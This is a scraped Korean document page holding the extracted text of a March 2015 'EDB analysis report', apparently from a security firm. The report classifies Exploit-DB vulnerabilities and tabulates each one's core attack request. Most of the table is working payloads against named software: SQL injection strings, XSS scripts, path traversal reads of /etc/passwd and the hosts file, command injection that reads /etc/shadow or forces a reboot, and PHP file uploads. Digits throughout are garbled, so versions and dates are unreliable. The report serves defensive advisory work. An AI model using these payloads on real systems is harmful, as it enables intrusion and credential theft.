EDB 분석보고서 (05.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

ODS-FM1

Secure Programming Lecture1 : Introduction

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

105È£4fš

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

제목 레이아웃

スライド タイトルなし

CD-RW_Advanced.PDF

1

!K_InDesginCS_NFH

User Guide

PCServerMgmt7

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

DR-M140 사용 설명서

MOVE TO THE LEFT OF THE KILL CHAIN AND STOP THE BAD GUYS MOVE TO THE RIGHT

vm-웨어-01장

Assign an IP Address and Access the Video Stream - Installation Guide

초보자를 위한 ADO 21일 완성

초보자를 위한 C++

<BFB9BCFAB0E6BFB5C1F6BFF8BCBEC5CD5F BFB9BCFAB0E6BFB520C4C1BCB3C6C FB3BBC1F628C3D6C1BEBBF6BAAFC8AF292E706466>

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>


문서 템플릿

Orcad Capture 9.x

1

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

(untitled)

¿ÀǼҽº°¡À̵å1 -new

PowerPoint Presentation

디지털데일리_스페셜리포트 1부.indd

[SHA-2] HASH 함수 중의 하나로, HASH는 임의의 길이의 데이터를 입력 받아 고정된 길이의 데이터(해시 값)로 출력합니다. 동일한 데이터인 경우 동일한 해시 값을 갖는다. 에 기초하여 메시지 무결성(오류/변조 탐지)을 확인하기 위하여 사용됩 니다. 하지만 서

3장

rv 브로슈어 국문

<3131C2F72875B7AFB4D7C0B8B7CE20B3AAB5B520C0CCC1A620BDC5C1F6BDC4292E687770>

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

당사의 명칭은 "주식회사 다우기술"로 표기하며 영문으로는 "Daou Tech Inc." 로 표기합니다. 또한, 약식으로는 "(주)다우기술"로 표기합니다. 나. 설립일자 및 존속기간 당사는 1986년 1월 9일 설립되었으며, 1997년 8월 27일 유가증권시장에 상장되

1

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

DocuPrint C3300 DX/C2200 User Guide

2016년 제31차 통신심의소위원회 회의록(심의의결서,공개, 비공개).hwp

기업 단체 교육 비영리단체 사용자에게 최적인 소프트웨어 도입 프로그램 FileMaker 볼륨 라이선스 Version 15 May 2016

<%DOC NAME%> User Manual

<4D F736F F D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2>

Analyst Briefing

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

1

레이아웃 1

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E C8A3292E687770>

Microsoft Word - KSR2014S042

3-2.hwp

1

1

BH의 아이폰 추천 어플

Backup Exec

C H A P T E R 2

Solaris Express Developer Edition

con_using-admin


cam_IG.book

1

<312E B3E2B5B520BBE7C8B8BAB9C1F6B0FC20BFEEBFB5B0FCB7C320BEF7B9ABC3B3B8AE20BEC8B3BB28B0E1C0E7BABB292DC6EDC1FD2E687770>

PowerPoint プレゼンテーション

Scene7 Media Portal 사용

Microsoft Word - junior.docx

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

1.LAN의 특징과 각종 방식

먼저 읽어 보세요! 주 의 : 화재의 위험을 줄이려면, 본 장비를 비 혹은 습기에 노출하지 않도록 하시기 바랍니다. 화재의 위험을 줄이려면, 본 장비를 모든 종류의 액체로부터 멀리하시기 바랍니다. 액체가 흐르거나 튈 염려가 없는 장소에 보관하시고, 장비 위에 어떤 종류

내지무인화_

별지 제10호 서식

Microsoft Word - HD-35 메뉴얼_0429_.doc

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Supplier_Connect_User_Guide_Korean

슬라이드 1

untitled

MPLAB C18 C

Transcription:

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 3 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting ( 이, XSS) 공격에대한보고가가장많았습니다. 분석된 XSS 공격들은매우낮은난이도를요구는공격인반면, 치명적인 차피해가일어날수있는공격입니다. 이와관련여특히주목할점은, 금월에가장많은이보고된 Open Source 기반 LMS 에서발생가능한 XSS 공격입니다. 따라서, 해당소프트웨어를사용고있는관리자는보안패치, 시큐어코딩등을실시여 XSS 공격에노출되지않도록각별한주의가필요합니다. 금월에는시스템의패스워드파일을노리는 Command 공격도발견되었습니다. 공격자가시스템상의주요파일을얻어낸경우보다쉽게시스템이탈취될수있습니다. 해당에노출되지않도록높은보안수준유지를권고합니다.. 별보고개수 보고개수 XSS 6 LFI 5 Command 3 File Upload 총합계 47 70 60 50 40 30 0 0 0 별보고개수 6 3 4 6 XSS LFI File Upload 총합계. 위험도별분류위험도 보고개수 백분율 상 6 34.04% 3 65.96% 0 0.00% 합계 47 00.00% 위험도별분류 40 상 3. 공격난이도별현황공격난이도 보고개수 백분율 상 5 0.64% 5 0.64% 37 78.7% 총합계 47 00.00% 공격난이도별현황 4 37 상 4. 주요소프트웨어별발생현황소프트웨어이름 pfsense PHPMoAdmin Bedita CMS ProjectSend Bester Elastix Codoforum Codiad WoltLab Triton and Websense appliance modules V-Series Citrix NetScaler EMC M&R (Watch4Net) Berta 총합계 보고개수 9 6 6 5 3 3 47 3 7 주요소프트웨어별발생현황 7 7 u5cms phpbugtracker Magento Server Zeuscart Piwigo etouch SamePage WeBid StaMPi Sefrengo Redaxscript Pragyan Pandora IBM Endpoint Manager Fork Exponent ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 36435 XSS LMS.9.0 - agenda_list.php XSS 36435 XSS LMS.9.0 - outbox.php XSS 36435 XSS LMS.9.0 - student.php XSS 36435 XSS LMS.9.0 - ajax_get_file_listing.php XSS 36435 XSS LMS.9.0 - configure_extensions.php XSS 36435 XSS LMS.9.0 - course_category.php XSS 36435 XSS LMS.9.0 - session_edit.php XSS 36435 XSS LMS.9.0 - system_status.php XSS 36435 XSS LMS.9.0 - session_add.php XSS 36385 Simple Photo Gallery v.0 - index.php 36435 상 상 ECommerce-WD Plugin..5 - index.php

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 36464 상 상 Spider FAQ - index.php 36560 상 Gallery WD - index.php 3656 Contact Form Maker.0. - index.php 36563 Gallery WD - index.php 36506 XSS status_captiveportal.php XSS pfsense 36506 XSS firewall_rules.php XSS pfsense 36506 XSS firewall_shaper.php XSS pfsense 36506 XSS services_unbound_acls.php XSS pfsense 36506 XSS diag_logs_filter.php XSS pfsense 36506 LFI 상 system_firmware_restorefullbackup.php LFI pfsense 3658 상 CMS.0..8 - /fiyo/dapur/index.php 3658 상 상 CMS.0..8 - article_list.php 3658 CMS.0..8 - check_user.php 3658 LFI 상 CMS.0..8 - browse.php LFI 3658 XSS CMS.0..8 - /fiyo/ XSS

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-0 365 Command PHPMoAdmin - moadmin.php Command /moadmin/moadmin.php HTTP/. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0.0; rv:36.0) Gecko/0000 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded PHPMoAdmin PHPMoAdmin object=;system('id;ls -lha');exit 05-03-0 3630 상 05-03-03 364 상 Calculated Fields Form Plugin.0.0 - options-general.php Theme Photocrati 4.x.x /wp-admin/optionsgeneral.php?page=cp_calculated_fields_form&u= or =&name=inserttext /wp-content/themes/photocrati-path-theme/ecommsizes.php?prod_id= or = Calculated Fields Form Plugin.0.0 Theme Photocrati 4.x.x 05-03-04 3665 XSS Bedita CMS - savemailgroups XSS /bedita- 3.5.0.corylus.6e9/bedita/index.php/newsletter/saveM ailgroups HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Bedita CMS Bedita CMS 3.5.0 data[mailgroup][id]=&data[mailgroup][group_name]=<sc ript>alert(0)</script> 05-03-06 36303 상 05-03-06 36306 상 ProjectSend r56 - useredit.php Bester v.0.4 - showprofile.php /projectsend/users-edit.php?id= or = /showprofile.php?id=' and = union select,concat(0x3a3a,0x55736573d,user(),0x0c04445f4 e66d653d,database(),0x3a3a),3,4,5,6,7-- ProjectSend Bester ProjectSend r56 Bester v.0.4 05-03-07 36305 상 Elastix v.x - iridium_threed.php /abilling/customer/iridium_threed.php?transactionid=- and =benchmark(000000,md5()) Elastix Elastix v.x 05-03-08 36374 File Upload 상 File Upload /wordpress/wp-content/plugins/reflexgallery/admin/scripts/fileuploader/php.php?year=05& Month=03 HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Plugin Reflex Gallery 3..3 -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="php.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-03-0 363 상상 v0.0. - index.php /index.php?page=' union all select,,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,),4,5,6,7,8,9,0 and 'j'='j v0.0. 05-03-0 363 상상 v0.0. - login.php /genixcms/gxadmin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 password=&username=' and(select from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,) ) from `information_schema`.tables limit 0,),floor(rand(0)*))x from `information_schema`.tables group by x)a) and ''='&login= v0.0. 05-03-0 363 XSS v0.0. - index.php XSS /index.php?page=<script>confirm("zsl")</script>' v0.0. 05-03-0 3630 LFI Codoforum v.5. - index.php LFI /index.php?u=serve/attachment&path=../../../../../sites/def ault/config.php Codoforum Codoforum v.5. 05-03- 3637 LFI Codiad v.5.3 - LFI /i/9756553/components/filemanager/download.php?pa th=../../../../../../../../../../../etc/passwd&type=undefined Codiad Codiad v.5.3

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-3 36368 XSS WoltLab Community Gallery v.0 - index.php - XSS /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad755 3c0f885e3ccb60edbc0b65d9eed HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 [title]=<script>alert('xss')</script> WoltLab WoltLab Community Gallery v.0 05-03-6 3644 XSS WPML v3..9 - XSS /?icl_action=reminder_popup&target=javascript:alert(/xss /);// WPML v3..9 05-03-6 36385 Simple Photo Gallery v.0 - index.php /index.php?option=com_simplephotogallery&view=images &albumid= or = Simple Photo Gallery v.0 05-03-7 3648 XSS v.5.9/v.6.8/v.7.5/v.8.3 - index.php /my/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 v.5.9/v.6.8/ v.7.5/v.8.3 config_title=" onmouseover=prompt("xss") > 05-03-7 3648 XSS v.5.9/v.6.8/v.7.5/v.8.3 /blog/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 v.5.9/v.6.8/ v.7.5/v.8.3 title=zsl"><script>alert("xss");</script> 05-03-8 3643 Command Triton v7.8.3 and Websense /appmng/servlet/commandlineservlet?type=exec&uuid=as appliance modules V-Series v7.7 dfasdf&module=na&command=ping&destination=7.0. - Command 0.' cat%0/etc/shadow' Triton and Websense appliance modules V- Series Triton v7.8.3 and Websense appliance modules V- Series v7.7 05-03-9 36435 XSS LMS.9.0 - agenda_list.php XSS /main/calendar/agenda_list.php?type=personal%7%0o nmouseover=%7confirm%80%9%7/%3e%3c!-- LMS.9.0 05-03-9 36435 XSS LMS.9.0 - outbox.php XSS /main/messages/outbox.php?f=social"+onmouseover="co nfirm(0) LMS.9.0 05-03-9 36435 XSS 05-03-9 36435 XSS 05-03-9 36435 XSS LMS.9.0 - student.php XSS LMS.9.0 - ajax_get_file_listing.php XSS LMS.9.0 - configure_extensions.php XSS /main/myspace/student.php?keyword=3337"+onmouse over=confirm(0)//&active=0&_qf search_user=&submit= Search /main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax _get_file_listing.php?editor=stand_alone&view=thumbnail &search=&search_name=admin&search_recursively=0&se arch_mtime_from=&search_mtime_to=&search_folder=;</ script><script>confirm(0)</script> /main/admin/configure_extensions.php?display=</script>< script>confirm(0)</script> LMS.9.0 LMS.9.0 LMS.9.0 05-03-9 36435 XSS LMS.9.0 - /main/admin/course_category.php?action=add&category= course_category.php XSS "/><script>confirm(0)</script> LMS.9.0 05-03-9 36435 XSS LMS.9.0 - session_edit.php XSS /main/admin/session_edit.php?page=resume_session.php %%0onmouseover=confirm%80%9 LMS.9.0 GET /main/admin/system_status.php?section=webserver 05-03-9 36435 XSS LMS.9.0 - system_status.php XSS HTTP/. LMS.9.0 User-Agent: <script>confirm(0)</script>

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-9 36435 XSS LMS.9.0 - session_add.php XSS /main/admin/session_add.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows LMS.9.0 formsent=&name=<script>confirm(0)</script>&coach_us ername=rehan&session_category=0&nb_days_acess_befor e=0&nb_days_acess_after=0&start_limit=on&day_start= &month_start=3&year_start=05&end_limit=on&day_en d=&month_end=3&year_end=06&session_visibility= /index.php?option=com_ecommercewd&controller=produ cts&task=displayproducts HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 05-03-9 36435 상상 ECommerce-WD Plugin..5 - index.php product_id=&product_count=&product_parameters_json= &search_name=&search_category_id=) AND (SELECT 558 FROM(SELECT COUNT(*),CONCAT(0x7786a6b7,(SELECT (ELT(558=558,))),0x7706a6a7,FLOOR(RAND(0)*)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (857=857&filter_filters_opened=&filter_manufacturer_ ids=&filter_price_from=&filter_price_to=&filter_date_add ed_range=0&filter_minimum_rating=0&filter_tags=&arran gement=thumbs&sort_by=&sort_order=asc&pagination_li mit_start=0&pagination_limit= ECommerce- WD Plugin..5 05-03-9 3644 Command Citrix NetScaler SDX svm-0.5-50-.9 - Command /nitro/v/config/xen_hotfix HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Citrix NetScaler Citrix NetScaler SDX svm-0.5-50-.9 object={"params"%3a{"action"%3a"start"}%c"xen_hotfi x"%3a[{"file_name"../../etc/passwd;reboot;"}]} 05-03-9 36440 LFI 05-03- 36464 상 상 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS EMC M&R (Watch4Net) prior v6.5u Spider FAQ - index.php status_captiveportal.php XSS firewall_rules.php XSS firewall_shaper.php XSS services_unbound_acls.php XSS diag_logs_filter.php XSS /devicediscovery/devicesource/downloadseedfile?filefilename=.. \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\wind ows\system3\drivers\etc\hosts /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0BY%0x)a) /status_captiveportal.php?zone=%7%%3e%3cscript %3Ealert%8%7ImmuniWeb%7%9;%3C/script%3E /firewall_rules.php?undodrag=&dragtable=&if=%7% %3E%3Cscript%3Ealert%8%7ImmuniWeb%7%9 ;%3C/script%3E /firewall_shaper.php?interface=wan&action=add&queue= %7%%3E%3Cscript%3Ealert%8%7ImmuniWeb %7%9;%3C/script%3E /services_unbound_acls.php?act=edit&id=%7%%3e %3Cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/ script%3e /diag_logs_filter.php?filterlogentries_submit=&filterlogen tries_time=%7%%3e%3cscript%3ealert%8%7im muniweb%7%9;%3c/script%3e EMC M&R (Watch4Net) EMC M&R (Watch4Net) prior v6.5u Spider FAQ 05-03-6 36506 LFI 상 system_firmware_restorefullbac kup.php LFI /system_firmware_restorefullbackup.php?deletefile=../etc/ passwd

EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-7 3650 File Upload 상 Berta CMS upload.php File Upload /engine/upload.php?entry=true&mediafolder=.all HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Berta Berta CMS -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="c.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-03-30 36560 상 Gallery WD - index.php /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0B/Y%0x)a) Gallery WD 05-03-30 3656 05-03-30 36563 05-03-3 3658 상 Contact Form Maker.0. - index.php Gallery WD - index.php CMS.0..8 - /fiyo/dapur/index.php /index.php?option=com_contactformmaker&view=contact formmaker&id=%0and%0= /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0BY%0x)a) /fiyo/dapur/index.php?app=user&act=edit&id=%0unio N%0ALL%0SELECT%0NULL,NULL,CONCAT(0x776 7647,0x6645707046445786c58,0x76a76747),NULL, NULL,NULL,NULL,NULL,NULL,NULL# Contact Form Maker.0. Contact Form Maker.0. CMS.0..8 05-03-3 3658 상상 CMS.0..8 - article_list.php /fiyo/dapur/apps/app_article/controller/article_list.php?cat =%7%0AND%0(SELECT%0435%0FROM(SELECT %0COUNT(*),CONCAT(0x7666f767,(SELECT%0(CA SE%0WHEN%0(435=435)%0THEN%0%0ELS E%00%0END)),0x76468767,FLOOR(RAND(0)*))x %0FROM%0INFORMATION_SCHEMA.CHARACTER_SE TS%0GROUP%0BY%0x)a)%0AND%0%7yeEe% 7=%7yeEe&user=%7%0UNION%0ALL%0SELECT %0NULL,CONCAT(0x7666f767,0x46557747546e6 b54,0x76468767),null,null,null,null,null,null,null,null#&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hmlh'='hmlh CMS.0..8 05-03-3 3658 CMS.0..8 - check_user.php /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows CMS.0..8 act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT 05-03-3 3658 LFI 상 CMS.0..8 - browse.php LFI /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en &act=download HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows CMS.0..8 dir=files&file=../../../../../../../etc/passwd 05-03-3 3658 XSS CMS.0..8 - /fiyo/ XSS /fiyo/?app=article&view=item3ab"><script>alert()</scri pt>0ccba&id=86 CMS.0..8